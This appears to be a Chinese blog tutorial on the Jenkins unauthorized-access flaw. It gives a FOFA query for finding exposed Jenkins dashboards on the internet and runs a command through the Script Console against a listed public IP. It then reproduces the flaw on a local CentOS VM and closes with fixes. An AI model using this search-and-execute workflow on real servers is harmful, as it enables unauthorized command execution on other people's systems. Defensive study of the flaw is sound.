Jenkins未授权访问漏洞

Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

漏洞复现

步骤一:使用以下fofa语法进行产品搜索

复制代码
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

复制代码
#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

实在找不到

靶场复现

环境准备

虚拟机centos IP:192.168.30.138

下载安装包,版本1.620.1.1.norach

复制代码
wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm

安装Jenkins

复制代码
rpm -ivh jenkins-1.620-1.1.noarch.rpm

启动Jenkins服务

复制代码
service jenkins start

关闭防火墙或放行8080端口

复制代码
systemctl stop firewalld.service

访问服务地址

http://192.168.30.138:8080/manage

http://192.168.30.138:8080/script

复制代码
#执行命令
println "whoami".execute().text  


漏洞修复

  1. 升级版本。
  2. 添加认证,设置强密码复杂度及账号锁定。
  3. 禁止把Jenkins直接暴露在公网。
相关推荐
啞謎专家几秒前
CentOS中挂载新盘LVM指南:轻松扩展存储空间,解决磁盘容量不足问题
linux·运维·服务器
s_little_monster13 分钟前
【Linux】进程信号的捕捉处理
linux·运维·服务器·经验分享·笔记·学习·学习方法
一大Cpp24 分钟前
Ubuntu与本地用户交流是两种小方法
linux·运维·ubuntu
小王不会写code28 分钟前
CentOS 7 镜像源失效解决方案(2025年)
linux·运维·centos
zyplanke31 分钟前
CentOS Linux升级内核kernel方法
linux·运维·centos
ghostwritten1 小时前
Docker Registry Clean
运维·docker·容器
niuniu_6662 小时前
简单的自动化场景(以 Chrome 浏览器 为例)
运维·chrome·python·selenium·测试工具·自动化·安全性测试
这儿有一堆花3 小时前
Kali Linux 2025.1a:主题焕新与树莓派支持的深度解析
linux·运维·服务器
wanhengidc3 小时前
算力服务器和普通服务器之间的不同之处
运维·服务器
阿噜噜小栈3 小时前
最新国内可用的Docker镜像加速器地址收集
运维·笔记·docker·容器